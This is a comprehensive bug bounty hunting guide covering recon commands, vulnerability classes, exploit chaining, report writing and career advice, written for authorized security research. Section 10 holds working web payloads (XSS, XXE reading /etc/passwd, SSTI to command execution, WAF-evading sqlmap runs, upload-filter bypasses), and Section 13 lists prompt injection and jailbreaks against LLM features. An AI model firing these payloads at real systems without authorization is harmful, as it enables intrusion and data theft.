Comprehensive Bug Bounty Hunting Guide

A practitioner’s reference for modern bug bounty hunting — methodology, platforms, reconnaissance pipelines, vulnerability hunting, exploit chaining, report writing, and career strategy. Compiled from 97 research sources (the largest collection in the research library).

Table of Contents

1. Fundamentals & Mindset
2. Bug Bounty Platforms
3. Scope Analysis & Target Selection
4. The End-to-End Methodology
5. Reconnaissance Pipeline
6. Subdomain Enumeration Deep Dive
7. Asset Discovery & Attack Surface Mapping
8. JavaScript Analysis & Secret Hunting
9. Content Discovery & Fuzzing
10. Vulnerability Classes to Hunt
11. Business Logic & Chaining
12. Cloud, API & Web3 Attack Surfaces
13. AI / LLM Testing
14. Real-World Disclosed Writeups
15. Report Writing & Triage
16. Tools & Automation Stack
17. Income & Payout Strategies
18. Common Mistakes & Anti-Patterns
19. Learning Resources
20. Quick Reference Cheat Sheets

1. Fundamentals & Mindset

Bug bounty hunting is the practice of finding and responsibly disclosing security vulnerabilities to organizations that reward researchers for their findings. Unlike traditional penetration testing, bug bounty is outcome-driven: no bug, no bounty. Payouts range from $50 nuisance bugs to $2M+ for critical cloud / crypto findings.

The three axes of success

Hunter vs. Surgeon mindset

The “hunter” sprays scanners at thousands of assets and hopes for a hit. The “surgeon” picks one endpoint, understands exactly what it does, reads the JavaScript, maps the data flow, and strikes at the gap between intended and actual behavior. In 2026, surgeons dominate.

Three traps that kill hunters:

1. Spray and pray — running the same Nuclei templates across thousands of hosts. Modern WAFs ignore this as background noise.
2. Tool collector syndrome — installing every GitHub tool but never reading the output.
3. Skipping the boring clues — ignoring weird error messages, subtle parameter behavior, or new features pushed last week. These are the gold mines.

Required knowledge baseline

• HTTP fundamentals (methods, status codes, headers, cookies, sessions)
• HTML, CSS, JavaScript — enough to read and modify
• One scripting language (Python or Bash) for automation
• Linux command line, regex, grep/jq/awk
• Networking (TCP/IP, DNS, TLS basics)
• OWASP Top 10 — not just to name them, but to exploit them

Mindset traits

• Patience — 95% of hunters quit in the first 6 months. The returns start after the bell curve.
• Curiosity — “What happens if I send this in reverse order? Empty array? Negative number?”
• Persistence — every duplicate, every N/A, every “informative” is data, not defeat.
• Ethics — never test without written permission. Never exfiltrate real user data. Never sit on a crit for leverage.

Earning trajectory (realistic)

Bug bounty is a marathon. The dropout curve is real; so is the income curve on the other side of it.

2. Bug Bounty Platforms

The major platforms mediate between researchers and program owners, handle triage, and push bounty payments.

Getting invited to private programs

• Submit consistent high-quality reports on public programs
• Avoid N/A and duplicate noise (platforms track your signal-to-noise ratio)
• Write public blog posts once disclosure is approved
• Engage with the community (Twitter/X, Discord, Reddit)
• Participate in LHEs (Live Hacking Events) when offered

VDP vs. paid programs

Start with Vulnerability Disclosure Programs (VDPs) — no bounty, but lower competition and forgiving scope. A few accepted VDP reports prove you can write clean submissions and get you invited to paid programs.

3. Scope Analysis & Target Selection

“Scope is negotiable.” — Jason Haddix

Scope is the most important document in any program. Read it before you run a single tool.

Anatomy of a scope page

1. In-scope assets — domains, wildcards, mobile apps, APIs, specific subdomains
2. Out-of-scope — corporate infra, third-party SaaS, staging, specific paths
3. Accepted vulnerabilities — what they pay for
4. Ineligible findings — the “always rejected” list (see §18)
5. Safe harbor — legal protection terms
6. Reporting rules — private vs public disclosure, timelines
7. Bounty table — severity → payout mapping

Target selection criteria

Hunt programs that match at least three of these:

• Large attack surface — wildcard scope (*.target.com) beats single-host
• Recent activity — programs updating scope or bounty tables are actively triaging
• Reasonable response times — check Hacktivity / platform stats
• Payout consistency — are reports actually paid, or downgraded?
• Your technology fit — do you know their stack? (e.g. .NET shops, Rails apps, GraphQL-heavy)
• Lower hunter count — check report counts, leaderboard depth
• New programs — first 30–60 days of a program are low-hanging fruit season

Avoid these target profiles (as a beginner)

• Apple, Google core, Microsoft (every bug already found)
• Crypto exchanges unless you can audit Solidity
• Programs with 20+ bounties paid per week (hyper-competition)
• Programs marked “low response rate”

Reading disclosed reports before hunting

Before touching a target, read every disclosed report for the program on Hacktivity. You learn:

• What classes they accept vs reject
• What severity they assign to common issues
• Which triagers are strict or lenient
• The tech stack via report details
• Historical blind spots (things that keep recurring)

4. The End-to-End Methodology

The canonical flow (Jason Haddix’s Bug Hunter’s Methodology, evolved through community iteration):

1. Pre-hunt intel       →  Read scope, disclosed reports, tech stack, recent news
2. Recon                →  Subdomains, asset discovery, fingerprinting
3. Attack surface map   →  Live hosts, tech stack, functionality inventory
4. Manual exploration   →  Browse the app, understand business logic
5. Targeted testing     →  Test chosen vuln classes against chosen surfaces
6. Chain & escalate     →  Combine low bugs into critical chains
7. Validation           →  7-question gate, reproduce on fresh session
8. Report writing       →  Impact-first, surgical PoC
9. Triage interaction   →  Respond fast, provide assistance
10. Disclosure & write-up →  Public blog post (once approved)

Weekly execution plan

Golden rule: one killer report beats twelve “maybe” submissions.

5. Reconnaissance Pipeline

Recon is the foundation — you cannot hunt what you cannot see. A modern recon pipeline has five stages:

Seed domain
    │
    ▼
[1] Passive subdomain enum     (certs, DNS archives, third-party APIs)
    │
    ▼
[2] Active subdomain enum      (brute force, permutation, DNS resolve)
    │
    ▼
[3] Live host discovery        (httpx, probing)
    │
    ▼
[4] Content / URL discovery    (wayback, crawl, fuzz)
    │
    ▼
[5] Classification & triage    (tech fingerprint, screenshot, gf patterns)

Passive vs active

Passive is stealthy and scope-safe. Active is louder but finds assets that passive misses.

Canonical recon one-liners

# Subdomains — passive
subfinder -d target.com -all -recursive -o subs_passive.txt
amass enum -passive -d target.com -o subs_amass.txt
assetfinder --subs-only target.com > subs_af.txt
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u > subs_crt.txt

# Merge
cat subs_*.txt | sort -u > all_subs.txt

# Resolve + live check
dnsx -l all_subs.txt -resp -a -o resolved.txt
httpx -l all_subs.txt -title -status-code -tech-detect -o live.txt

# Historical URLs
cat live.txt | waybackurls > urls_wayback.txt
cat live.txt | gau > urls_gau.txt
katana -list live.txt -d 5 -jc -o urls_katana.txt

# Merge + filter
cat urls_*.txt | sort -u | grep -vE '\.(png|jpg|css|woff|svg|ico)$' > urls_clean.txt

Pipeline philosophy

Don’t dump 10,000 subdomains into a text file and call it recon. Modern recon is about filtering to the 5 most promising targets — subdomains with admin, api, staging, dev, internal, unusual technology stacks, or recent change signatures.

6. Subdomain Enumeration Deep Dive

Subdomain enumeration is the single highest-leverage recon activity. One forgotten dev-internal.target.com can hold the whole payout.

Data sources

Advanced techniques (from 2024–2026 research)

• Virtual host fuzzing — ffuf -u target.com -H "Host: FUZZ.target.com" -w wordlist to find unlisted vhosts.
• Copyright notice enumeration — search Shodan/Censys for unique copyright strings to find hosts owned by the same org.
• SSL certificate error monitoring — hosts with expired/broken certs are often forgotten dev infra.
• Job posting OSINT — companies list their tech stack in job ads; use this to build custom wordlists.
• R2 dev feature on Cloudflare R2 — dev flag exposes bucket contents; dork for it.
• Subdomain permutation — dnsgen, altdns, gotator take known subs and generate variants.
• TLS SAN field mining — pull all certificate SAN entries from a known host to find sibling domains.

Tools

Continuous monitoring

The 2026 advantage: new code is buggy code. Automate detection of new subdomains, new endpoints, new JavaScript files. When a new asset appears, you’re the first to test it.

• Sublert — subscribes to CT logs, alerts on new subdomains
• Cron-scheduled subfinder + diff against baseline
• GitHub watchlists for target’s public repos
• wget --mirror diffs of key pages to catch content changes
• httpx -title diffs to catch new landing pages

7. Asset Discovery & Attack Surface Mapping

Subdomains are step one. Now you map what’s actually running.

Live host discovery

cat all_subs.txt | httpx \
  -status-code -title -tech-detect \
  -follow-redirects -threads 100 \
  -o live_hosts.txt

httpx can also take screenshots, output JSON, and probe multiple ports (-ports 80,443,8080,8443).

Port scanning

Bug bounty scope usually limits port scanning to standard web ports, but when allowed:

naabu -list resolved_ips.txt -rate 1000 -o open_ports.txt
nmap -sV -sC -p- -iL resolved_ips.txt -oA nmap_full

Focus on weird ports: 8000, 8080, 8443, 9000, 9090, 5000, 3000, 4000, 7000 — often internal tools exposed by mistake.

Technology fingerprinting

Why it matters: tech stack tells you which bugs to hunt. Spring Boot → actuator endpoints, Log4Shell variants. WordPress → plugin CVEs. Next.js → SSRF in image optimizer. Old jQuery → prototype pollution.

Screenshot grids

Dump all live hosts into a screenshot tool for fast visual triage:

• aquatone — classic but unmaintained
• gowitness — modern Go-based
• httpx -screenshot — built-in

Scan the grid for login pages, admin panels, default installs, error pages, Swagger UIs.

Attack surface inventory

For each live host, catalogue:

• Login / registration flows
• Password reset mechanism
• File upload endpoints
• API endpoints (REST, GraphQL, SOAP)
• Admin panels
• Search features
• Payment / billing
• User-to-user features (messaging, sharing)
• Webhook / URL fetching features
• SSO integrations
• Mobile / desktop API backends

8. JavaScript Analysis & Secret Hunting

Modern web apps leak everything in JavaScript. JS analysis is frequently the highest-value recon activity on SPA-heavy targets.

What to extract from JS files

JS collection pipeline

# Collect all JS files
cat urls_all.txt | grep -E '\.js(\?|$)' | sort -u > js_urls.txt

# Download them
mkdir js_files && cd js_files
cat ../js_urls.txt | xargs -P 20 -I {} wget -q {} 

# Extract endpoints
for f in *.js; do python3 linkfinder.py -i "$f" -o cli; done | sort -u > endpoints.txt

# Search for secrets
for f in *.js; do python3 SecretFinder.py -i "$f" -o cli; done

What counts as a “secret”

• AWS keys (AKIA...), Google API keys (AIza...), Stripe keys (sk_live_...)
• Internal API base URLs
• Hardcoded JWT tokens
• Firebase configs that allow read/write
• Algolia admin keys (not search keys)
• SendGrid / Mailgun keys
• Slack webhook URLs
• GitHub PAT tokens

Test found secrets carefully — many are public keys that are safe by design. The distinction between pk_live_ and sk_live_ on Stripe is the difference between N/A and a crit.

DOM XSS via DevTools breakpoints

Chrome DevTools → Sources → Event Listener Breakpoints. Set breakpoints on DOM modification events. Navigate the app. When breakpoint fires, inspect the call stack and look for your input flowing into innerHTML, document.write, eval, or location.href.

9. Content Discovery & Fuzzing

Not everything is linked. Directory and parameter fuzzing finds the paths humans forgot.

ffuf (Fuzz Faster U Fool)

The current standard. Fast, flexible, Go-based.

Core syntax:

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,401,403

Common patterns:

Wordlists that matter

Targeted fuzzing vs blind fuzzing

Don’t fuzz the root of a website with a 5M entry wordlist. Instead:

1. Fingerprint tech first → use tech-specific wordlist (wordlists/wordpress.txt, wordlists/express.txt)
2. Crawl the app, extract existing paths → build a custom wordlist of “sibling” paths
3. Look for patterns (/api/v1/users, try /api/v2/users, /api/v1/admin)
4. Fuzz multiple HTTP methods — POST, PUT, DELETE, PATCH find different routes than GET

HTTP method tampering

for m in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT; do
  curl -X $m -s -o /dev/null -w "$m: %{http_code}\n" https://target.com/api/users/1
done

Surprising numbers of endpoints accept PUT or DELETE without auth while GET requires it.

Hidden parameters

10. Vulnerability Classes to Hunt

The core catalog. Each class has its own sub-methodology; this section gives you the scent.

10.1 IDOR (Insecure Direct Object Reference)

Description: Server returns/modifies data based on a user-supplied ID without verifying ownership.

Where to look:

• URL path params: /api/users/123, /orders/456
• Query strings: ?user_id=123
• POST bodies: {"invoice_id": 123}
• GraphQL variables
• Any resource accessed by numeric or UUID identifier

Testing:

1. Create two accounts (A and B).
2. As A, access/modify your own resource.
3. Replay the request as B, but with A’s resource ID.
4. Expected: 403/404. Actual bug: 200 + A’s data.

Escalation:

• Read other users’ PII → critical
• Modify other users’ email/password → ATO
• Access to admin-only resources → privilege escalation

Variants:

• UUIDs leaking in unrelated responses, then used in other endpoints
• Predictable IDs (auto-increment integers)
• IDs in HTTP headers (X-User-Id)
• Path traversal variant: /users/me → /users/../admin

10.2 XSS (Cross-Site Scripting)

Reflected: User input echoed in response unfiltered.
Stored: Persisted input rendered later.
DOM: Client-side JS passes user input to a sink without sanitization.
Blind: Injected payload fires in an admin-only context.

Hunt targets:

• Search boxes, comment fields, profile fields, names, bios
• URL fragments (#) and query params
• Any feature where admins review user input (tickets, reports, feedback)
• Error pages that reflect parameters
• SVG uploads, Markdown renderers, rich text editors

Core payload progression:

"><svg onload=alert(1)>
javascript:alert(1)
<img src=x onerror=alert(1)>
<details open ontoggle=alert(1)>
<iframe srcdoc="<script>alert(1)</script>">

Blind XSS: Use a blind XSS service (XSSHunter, KnoxSS, your own webhook) to catch delayed fires in admin panels.

CSP bypass hunting: If CSP whitelists *.google.com, JSONP endpoints can execute arbitrary JavaScript even with CSP enforced.

10.3 SQL Injection

Detection signals:

• Error-based: single quote → 500
• Boolean-based: AND 1=1 / AND 1=2 return different content
• Time-based: SLEEP(5) delays response
• Union-based: can enumerate columns

Tools:

• sqlmap — the swiss army knife. Basic usage:

sqlmap -u "https://target.com/item?id=1" --batch --dbs
sqlmap -r request.txt --level 5 --risk 3 --tamper=space2comment

Tamper scripts evade WAFs: space2comment, between, randomcase, charunicodeencode.

Where to look: Login forms, search filters, sort parameters, numeric IDs in query strings, cookies that look like DB values.

Modern SQLi: NoSQL injection ($ne, $gt operators in JSON bodies), ORM injection (second-order), header injection (User-Agent, X-Forwarded-For logged to DB).

10.4 SSRF (Server-Side Request Forgery)

See the dedicated SSRF guide. Quick scent:

• Any parameter named url, uri, path, src, dest, redirect, callback, webhook, endpoint
• Features: link preview, PDF export, image proxy, RSS import, OAuth callback, import from URL
• Test: point it at your Burp Collaborator / interactsh domain, confirm DNS+HTTP callback
• Escalate: internal port scan, cloud metadata (169.254.169.254), file read via file://

10.5 Open Redirect

Usually low-severity alone, but golden in chains:

• OAuth token theft via redirect_uri smuggling
• Phishing landing page under legitimate domain
• XSS via javascript: URIs when redirect accepts schemes

Tests:

?next=https://evil.com
?url=//evil.com
?redirect=/\evil.com
?return_to=https://target.com@evil.com

10.6 XXE (XML External Entity)

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

Hunt: SOAP endpoints, SAML requests, SVG uploads, XLSX/DOCX parsers, RSS/Atom consumers.

Blind XXE uses out-of-band DTDs to exfiltrate data to your server.

10.7 Command Injection

Input that reaches a shell. Separator characters: ;, |, `, $(), &&, %0a.

Hunt: features that run tools on user input (image convert, ffmpeg, ping utility, DNS lookup, backup jobs).

Tool: commix — automated OS command injection exploitation.

10.8 SSTI (Server-Side Template Injection)

Test fingerprint: {{7*7}} → 49 means template engine. ${7*7} → 49 means Java-style.

Engine-specific payloads escalate to RCE:

• Jinja2 → {{''.__class__.__mro__[1].__subclasses__()...}}
• Twig → {{_self.env.registerUndefinedFilterCallback(...)}}
• Freemarker → <#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}

10.9 File Upload

Bypass layers:

1. Extension — .php, .phtml, .phar, .jsp, .jspx, .asp, .aspx, .ashx
2. Double extension — shell.jpg.php
3. Null byte (legacy) — shell.php%00.jpg
4. Content-Type — change to image/png while content is PHP
5. Magic bytes — prepend \x89PNG\r\n\x1a\n to PHP payload
6. Filename case / unicode — shell.pHp, shell.p\u0068p

Post-upload: find where it’s stored, check if executed, try accessing via direct URL.

Secondary impacts: image/SVG with XSS, DOCX with XXE, malicious PDF triggering SSRF in PDF renderer, ZIP slip via archive extraction.

10.10 Authentication & Session Bugs

• No rate limiting on login → credential stuffing
• Password reset token predictable / reusable / long-lived
• Email confirmation bypass (change email without confirming old)
• OAuth state parameter missing → CSRF token theft
• JWT with none algorithm accepted
• JWT with kid injection (point to file with known content)
• Session not invalidated on logout / password change
• MFA bypass via response tampering
• Default/weak passwords on admin accounts
• User enumeration via differential responses

10.11 Authorization Bypass

• Path-based: /admin blocked, /admin/ or /Admin or /admin;/ works
• HTTP method: GET blocked, POST allowed
• Header tricks: X-Original-URL, X-Rewrite-URL, X-Forwarded-For: 127.0.0.1
• JWT role claim modification
• GraphQL missing field-level auth

10.12 Race Conditions

Classic patterns:

• Double-spend: redeem the same coupon/gift card twice in parallel
• Rate limit bypass: send 100 requests in parallel before counter increments
• TOCTOU: check-then-use split across requests
• Bank transfer TOCTOU

Tool: Burp Repeater → Send in parallel (single-packet attack for HTTP/2). race-the-web, turbo-intruder.

10.13 CSRF

Still valid when:

• State-changing POST without anti-CSRF token
• JSON-accepting endpoint with Content-Type: text/plain workaround
• SameSite cookie misconfigured
• CORS misconfigured (reflecting Origin + allowing credentials)

10.14 HTTP Request Smuggling

CL.TE, TE.CL, TE.TE, browser-powered desync. Extremely high impact when it works: session theft, cache poisoning, WAF bypass, internal path access.

Tools: Burp HTTP Request Smuggler (Albinowax’s extension), smuggler.py.

See PortSwigger’s annual Top 10 Web Hacking Techniques list for the latest variants.

10.15 Cache Poisoning

• Unkeyed headers (X-Forwarded-Host, X-Forwarded-Scheme) reflected into cached responses
• HTTP hop-by-hop header abuse
• Akamai/Cloudflare edge node poisoning via protocol anomalies
• Cache key normalization bugs

Reference: “Worldwide Server-side Cache Poisoning on All Akamai Edge Nodes” earned a $50k bounty.

10.16 Prototype Pollution

Client-side: merge user input into an object without validation → pollute Object.prototype → DOM XSS via gadget.

Server-side: same idea via JSON body parsing, escalates to RCE in Node.js apps.

10.17 GraphQL-Specific

• Introspection enabled in production → attack surface leak
• Batch queries for rate limit / brute force
• Alias-based enumeration
• Depth-based DoS
• Field-level authorization misses
• Mutation abuse

Tools: InQL (Burp extension), graphql-voyager, graphql-cop, clairvoyance.

10.18 CORS Misconfiguration

Reflecting attacker origin with credentials = cross-origin data theft. Also: null origin reflection, pre-wildcard prefix check bypass, trusting *.target.com without proper regex.

10.19 Subdomain Takeover

Dangling DNS (CNAME → decommissioned SaaS). Claim the SaaS resource → control the subdomain → host phishing/XSS/cookie theft.

Tools: subjack, subzy, nuclei takeover templates, dnsReaper.

Categories vulnerable: GitHub Pages, S3, Heroku, Azure, Shopify, Tumblr, Zendesk, Unbounce, Helpjuice, Statuspage.

10.20 Information Disclosure

Exposed files that still turn up regularly: /.git/config, /.git/HEAD, /.env, /.DS_Store, /backup.zip, /api/swagger.json, /actuator/env, /actuator/heapdump, /server-status, /phpinfo.php, /wp-config.php.bak.

11. Business Logic & Chaining

Business logic bugs are where scanners fail and humans win. They’re also usually the highest-paying because they cannot be caught by automation.

Categories

The 4-question framework

For every endpoint, ask:

1. What is this supposed to do? (understand normal flow)
2. What data can I control? (params, headers, filenames, body fields)
3. Where does this data go? (reflected, stored, queried, forwarded)
4. What if I break the expected flow? (swap IDs, skip steps, reorder, send arrays)

Chaining low severity into critical

The biggest skill gap between medium and elite hunters is chaining. A single CORS misconfig is low. A single open redirect is low. A single XSS in a reflected error page is medium. But chained together:

Open Redirect (on oauth.target.com)
    ↓ redirects attacker-controlled URL via token parameter
OAuth authorization code leak
    ↓ steal victim's session
Account takeover
    → critical, $10k+

Common chains:

Never report a chain-worthy bug in isolation. Build the full story, then submit.

12. Cloud, API & Web3 Attack Surfaces

Cloud misconfigurations

API security

• REST: missing auth on some methods, mass assignment, rate limit absence, inconsistent IDOR across endpoints
• GraphQL: see §10.17
• gRPC: reflection enabled, no field-level authz
• SOAP: WSDL exposure, XXE, WS-Security bypass
• Webhooks: SSRF sink, signature bypass, replay attacks

Reference checklist: OWASP API Security Top 10 (2023 edition).

Web3 / smart contract (brief)

Immunefi-tier target class. Completely different skillset. Categories:

• Reentrancy
• Access control (missing onlyOwner)
• Oracle manipulation (flash loan attacks)
• Integer overflow/underflow (pre-0.8.x)
• Front-running / MEV
• Signature replay
• Proxy upgrade bugs
• ERC20 transfer bugs

If you want to hunt web3, learn Solidity, use Foundry for PoCs, read audits on Trail of Bits / OpenZeppelin blogs.

13. AI / LLM Testing

The new attack surface circa 2024–2026. Targets pay for:

Prompt injection

• Direct: user input controls the system prompt
• Indirect: attacker content (email, webpage) is fed to the LLM and injects instructions
• Jailbreak: bypass safety filters

LLM-adjacent bugs

• Training data leakage — extract memorized PII or source
• API key leakage — system prompt contains the OpenAI key
• SSRF via plugin/tool use — LLM can call URLs on attacker’s behalf
• RCE via code execution tools — sandbox escape in code interpreter features
• Business logic bypass — trick AI support agent into approving refunds, issuing credits

MCP / agentic tools

Model Context Protocol servers often wrap internal APIs with weaker auth than the underlying service. Test the MCP layer separately; if SSRF or auth-bypass exists at that layer, impact cascades.

14. Real-World Disclosed Writeups

Patterns from high-value disclosed reports. Study these shapes — they repeat.

Sam Curry & Shubham Shah — Web3 Universal XSS via Netlify Next.js

Methodology: identified that Netlify’s Next.js library had an SSRF primitive in image optimization. Combined with cache poisoning and XSS, achieved universal XSS across dozens of crypto sites sharing the same infra. Takeaway: shared infrastructure = shared vulnerabilities. Find the common dependency and exploit it once for N targets.

Frans Rosén — OAuth account hijacking via “dirty dancing”

Chained promiscuous postMessage handlers, third-party XSS, and URL storage to steal OAuth authorization codes across dozens of sites despite modern referrer-stripping mitigations. Takeaway: OAuth flow quirks + seemingly-low-severity gadgets = account takeover chains.

James Kettle — Browser-powered desync attacks

Extended HTTP Request Smuggling to trigger from victim’s browser. Takeaway: request smuggling is not dead — new variants emerge every year.

Jacopo Tediosi — Worldwide Akamai edge cache poisoning ($50k)

Abused HTTP hop-by-hop headers against Akamai edge nodes. Takeaway: edge CDN behaviors differ from origin; test every layer.

Simon Scannell — Zimbra memcache injection

Protocol-level injection in memcached via CRLF smuggling. Stole clear-text credentials. Takeaway: deep protocol knowledge beats surface-level testing.

Felix Wilhelm — Hacking the Cloud with SAML

SAML XML parsing quirks → integer truncation → arbitrary bytecode execution during signature verification. Takeaway: SAML/JWT/SSO are cryptographic obstacle courses with enormous attack surface.

Markus Wulftange — .NET SerializationBinder bypass

Showed why SerializationBinder can’t be used for security; built exploits for DevExpress and Exchange. Takeaway: read docs that changed recently; security statements get retracted.

Neil Madden — Psychic Signatures in Java (CVE-2022-21449)

ECDSA signature verification accepted r=0, s=0 as valid for any message. Bypassed JWT and SAML across Java ecosystem. Takeaway: classical crypto bugs still ship in modern libraries.

Medi — Client-side path traversal

User input in request paths, combined with CSRF and URL leakage, escalated to real impact. Takeaway: low-apparent-severity patterns can accumulate into criticals.

Cookie worth a fortune (Gaurav Narwani)

A single overlooked cookie scope bug led to session hijacking across multiple subdomains, earning a large bounty. Takeaway: check every cookie’s Domain, Path, Secure, HttpOnly, SameSite attributes.

Source code disclosure via exposed .git folder

Classic .git/config exposure on production web servers lets attackers clone the repo with git-dumper, recovering source code, credentials, and internal paths. Still prevalent. Always check: /.git/HEAD, /.git/config, /.svn/entries, /.env, /.DS_Store.

15. Report Writing & Triage

A perfect bug with a bad report gets downgraded or closed. A mediocre bug with a great report gets paid.

Report structure (universal)

1. Title        — [Vuln Class] at [Endpoint] leads to [Impact]
2. Summary      — 2-3 sentences: what, where, why it matters
3. Severity     — your CVSS 3.1 suggestion with justification
4. Steps to Reproduce — numbered, exact, copy-pasteable
5. Proof of Concept — HTTP request/response, screenshots, video
6. Impact       — business consequence in plain English
7. Remediation  — actionable fix
8. References   — OWASP / CWE links

Title formula

[Bug type] in [specific feature/endpoint] allows [specific attacker action]

Good: “Stored XSS in profile bio field allows session hijacking of any user viewing the profile” Bad: “XSS on target.com”

Impact writing

Impact is what a real attacker could do, not a textbook definition of the bug class. Write the newspaper headline.

Weak: “SSRF vulnerability allows internal port scanning.” Strong: “SSRF in the image import feature allows an unauthenticated attacker to read AWS IAM credentials from the instance metadata service, enabling full compromise of the production AWS account and access to customer data.”

Steps to reproduce

• Number every step
• Include the exact HTTP request (from Burp → Copy as curl)
• Specify account requirements (“as a free-tier user A, register a second account B…”)
• Include expected vs actual behavior on the last step
• Assume the triager is bored and won’t read twice

Proof of concept

• Real HTTP traffic captures (raw request + response)
• Screenshots with the URL bar visible
• 30-60 second video max; voiceover optional but helpful
• If exfiltration: use placeholder data, not real users
• If RCE: run id, whoami, hostname — nothing destructive

Severity scoring (CVSS 3.1 quick reference)

Don’t inflate. Triagers see through it. Downgrades hurt your reputation.

Always-rejected findings (the N/A list)

Save yourself the hit to your stats:

• Self-XSS (victim attacks themselves)
• Missing security headers (X-Frame-Options, CSP) without exploitation
• SPF / DMARC / DKIM issues
• Rate limit absence on non-sensitive endpoints
• Username / email enumeration without impact
• Clickjacking on pages without state-changing actions
• CSRF on logout / unauthenticated endpoints
• Information disclosure in error messages (unless secrets)
• HTTPS / TLS configuration nits
• Denial of service via resource exhaustion
• CVEs in outdated libraries without a working exploit on this app

Triage interaction

• Respond within 24h to triager messages
• Stay polite even when downgraded
• Provide additional PoCs if asked — never argue first
• If you disagree with severity, escalate politely with facts
• Do not ask for bounty increases before fix

Report templating tools

• bountyplz (fransr/bountyplz) — markdown templates for H1/Bugcrowd/Intigriti
• ZephrFishBugBountyTemplates — stock report templates
• Your own Notion/Obsidian template — most hunters end up here

16. Tools & Automation Stack

The 2026 bug bounty software stack. You don’t need everything — most hunters use 10–15 core tools.

Core proxy / testing

Burp extensions worth installing

• Logger++ — request history with filters
• Autorize — auth/authz testing automation
• Turbo Intruder — fast Python-scripted attacks
• Param Miner — hidden parameter discovery
• Backslash Powered Scanner — advanced active scanner
• HTTP Request Smuggler — Albinowax’s smuggling extension
• JWT Editor — JWT manipulation
• InQL — GraphQL scanner
• Reshaper — request/response transformations
• Collaborator Everywhere — inserts Collaborator payloads everywhere

Recon tools (ProjectDiscovery suite)

• subfinder — subdomain enum
• dnsx — DNS resolver
• httpx — HTTP probing
• naabu — port scanner
• katana — crawler
• nuclei — template-based scanner
• chaos-client — chaos dataset
• uncover — Shodan/Censys CLI
• interactsh — OOB interaction server (like Collaborator)

Other staples

Automation philosophy

Automate intelligence, not discovery. Don’t just run nuclei — build a pipeline that:

1. Finds new subdomains daily
2. Screenshots them and fingerprints tech
3. Highlights ones matching high-value patterns (admin, api, dev)
4. Alerts you via Discord/Slack
5. Queues them for your manual review

Your automation is a research assistant, not a noise machine.

The one-liner culture

# Find JS files and extract endpoints
subfinder -d target.com | httpx -silent | katana -silent -jc | grep '\.js$' | xargs -I {} curl -s {} | grep -oE '"[^"]*/[^"]+"' | sort -u

# Quick nuclei takeover scan across all subs
subfinder -d target.com | dnsx -silent | nuclei -tags takeover

# Historical param extraction + gf xss filter
echo target.com | waybackurls | gf xss | qsreplace '"><svg onload=alert(1)>' | httpx -mc 200 -mr 'svg onload'

See 0xPugal/One-Liners and other collections for hundreds more.

AI / Claude-assisted workflows

• Feed an HTTP request/response pair to an LLM and ask for vulnerability hypotheses
• Paste a JavaScript file and ask for DOM sink analysis
• Ask for business logic flaw hypotheses given a feature description
• Draft report narratives from raw notes
• Generate CVSS justifications

Tools: shuvonsec/claude-bug-bounty and similar — AI-powered hunting from the terminal.

Rule: AI is a copilot, never the pilot. It produces leads; you verify.

17. Income & Payout Strategies

Bug bounty income is extremely lumpy. Stabilizing it requires strategy.

Income shape

Month-over-month income for even top hunters looks like:

Month 1: $0
Month 2: $500
Month 3: $200
Month 4: $15,000  (one crit)
Month 5: $800
Month 6: $0
Month 7: $3,000

This is normal. One big crit pays for months of dry spell.

Strategies to smooth income

1. Portfolio of programs — hunt 3–5 programs in rotation, not one
2. Mix severities — bread-and-butter IDORs/low XSS for consistency + crit attempts for upside
3. LHE (Live Hacking Events) — invite-only events with guaranteed payouts and bonuses
4. VDPs for reputation — unpaid but build signal for private invites
5. Private programs — better payout per hour than public
6. Retainer / part-time pentest — combine bounty with contract work
7. Training & course sales — many elite hunters earn half their income from education
8. Writeups / blog / YouTube — secondary income from reputation

Bounty ranges by platform (typical)

Maximizing payouts

• Chain bugs — critical payouts are 5–10× high payouts
• Write better reports — impact-first writing prevents downgrades
• Hunt on new scope — freshly-added assets pay better
• Be the first — duplicates pay nothing; speed matters on new releases
• Follow bounty tables — some programs pay more for specific classes (auth bypass, RCE)
• Negotiate on edge cases — if severity is borderline, make the case politely

Tax considerations

Bug bounty income is self-employment income in most jurisdictions. Budget for:

• Self-employment tax
• Quarterly estimated payments
• Business deductions (tools, lab infrastructure, training)

Consult a local accountant. Programs issue 1099s (US) or equivalent.

18. Common Mistakes & Anti-Patterns

Every hunter makes these. The goal is to stop making them faster than the next hunter.

Methodology mistakes

• No scope reading — test out-of-scope assets, get reports closed or banned
• Tool-first, thinking-second — nuclei blast, no manual review
• Single-pass recon — never re-run recon; miss new assets
• No note-taking — lose previously-found interesting endpoints
• Hunting the crowded targets — fighting 500 other hunters on Shopify
• Skipping disclosed reports — miss the patterns
• Jumping between targets — never build deep target knowledge

Testing mistakes

• Self-XSS reported as stored — rejected
• Reporting CVE without working exploit — N/A
• Not reproducing on a clean session — false positives
• Testing authenticated as the only user — miss auth bypass entirely
• Using real user data for PoCs — TOS violation, possible legal issue
• Not cleaning up — leaving test data, uploads, comments

Report mistakes

• Vague titles — “Bug found” or “XSS on target.com”
• Textbook impact — copy-pasted OWASP definition instead of real-world consequence
• No video/GIF for complex chains — triager doesn’t understand
• Arguing severity before fix — burns goodwill
• Disclosing publicly before approval — program ban

Career mistakes

• Burnout from grinding — 40+ hours/week for 3 months → quit
• Chasing crits only — never getting paid anything
• Not learning continuously — 2023 methodology fails in 2026
• Isolating from community — no invites, no knowledge share
• Quitting day job too early — runway < 12 months is dangerous
• Ignoring taxes — ugly surprise

The 95% dropout rule

95% of people who start bug bounty quit within 6 months with zero earnings. If you can survive 12 months of sustained effort, you’re already elite by selection alone.

19. Learning Resources

Free structured learning

• PortSwigger Web Security Academy — the single best free resource, practical labs
• HackerOne Hacktivity — real disclosed reports
• Bugcrowd University — structured videos
• TryHackMe Bug Bounty Path — guided rooms
• HackTheBox Academy — paid, high quality
• PentesterLab — bite-sized exercises
• OWASP WebGoat / Juice Shop / DVWA / bWAPP — practice platforms

Must-read books

• The Web Application Hacker’s Handbook (Dafydd Stuttard) — still the canonical reference
• Real-World Bug Hunting (Peter Yaworski) — disclosed report case studies
• Bug Bounty Bootcamp (Vickie Li) — modern entry-level guide
• The Tangled Web (Michal Zalewski) — browser internals
